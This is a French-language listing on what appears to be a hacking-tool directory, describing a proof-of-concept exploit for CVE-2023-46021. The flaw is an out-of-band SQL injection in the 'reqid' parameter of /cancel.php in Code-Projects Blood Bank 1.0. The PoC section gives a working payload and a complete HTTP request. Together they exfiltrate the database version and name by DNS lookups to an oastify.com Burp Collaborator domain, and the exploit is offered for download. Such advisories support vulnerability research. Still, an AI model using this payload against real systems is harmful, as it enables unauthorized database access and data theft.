Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability — Preuve de concept d'exploitation pour une injection SQL hors bande dans Code-Projects Blood Bank V1.0 via le paramètre reqid, permettant l'extraction de la version de la base de données et des données via Burp Collaborator. | Kitploit
Outils/GitHubGitHub/ersinerenler/cve-2023-46021-code-projects-blood-bank-1.0-sql-injection-vulnerability
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubersinerenler/cve-2023-46021-code-projects-blood-bank-1.0-sql-injection-vulnerability

CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

Preuve de concept d'exploitation pour une injection SQL hors bande dans Code-Projects Blood Bank V1.0 via le paramètre reqid, permettant l'extraction de la version de la base de données et des données via Burp Collaborator.

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-46021-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnérabilité

  • Auteur de l'exploit : ersinerenler

Page d'accueil du fournisseur

  • https://code-projects.org/blood-bank-in-php-with-source-code

Lien du logiciel

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

Présentation

  • Code-Projects Blood Bank V1.0 est exposé à une vulnérabilité de sécurité critique impliquant une injection SQL hors bande (OOB) via le paramètre 'reqid' dans le fichier /cancel.php. Cette vulnérabilité résulte d'un manque de mécanismes de protection adéquats, permettant aux attaquants d'abuser du paramètre et de mener des attaques par injection SQL hors bande via Burp Collaborator. Cela peut entraîner un accès non autorisé et l'extraction d'informations sensibles des bases de données.

Détails de la vulnérabilité

  • ID CVE : CVE-2023-46021
  • Version affectée : Blood Bank V1.0
  • Fichier vulnérable : /cancel.php
  • Nom du paramètre : reqid
  • Type d'attaque : Local
  • Références :

    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46021
    • https://nvd.nist.gov/vuln/detail/CVE-2023-46021

    Description

    • Le paramètre 'reqid' dans le fichier /cancel.php de Code-Projects Blood Bank V1.0 est susceptible à une injection SQL hors bande. Cette vulnérabilité provient de mécanismes de protection inadéquats, permettant aux attaquants d'exploiter le paramètre en utilisant Burp Collaborator pour lancer des attaques par injection SQL hors bande. Grâce à cette technique, un attaquant peut potentiellement extraire des informations sensibles des bases de données.

    Preuve de concept (PoC) :

    • Intercepter la requête vers cancel.php via Burp Suite
    • Injecter la charge utile dans les paramètres vulnérables
    • Charge utile : 4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
    • Exemple de requête pour le paramètre reqid
    root@kitploit:~
    ---
    GET /bloodbank/file/cancel.php?reqid=4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.7mus27hip62tznk3gy4n7z3fo6uxin6c.oastify.com\\a.txt')))%2b' HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: http://localhost/bloodbank/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A+.%20Our%20team%20will%20contact%20you%20soon.
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    ---
    
    • Les informations de base de données et de version ont été saisies via Burp Suite Collaborator
    image
    Télécharger l’outil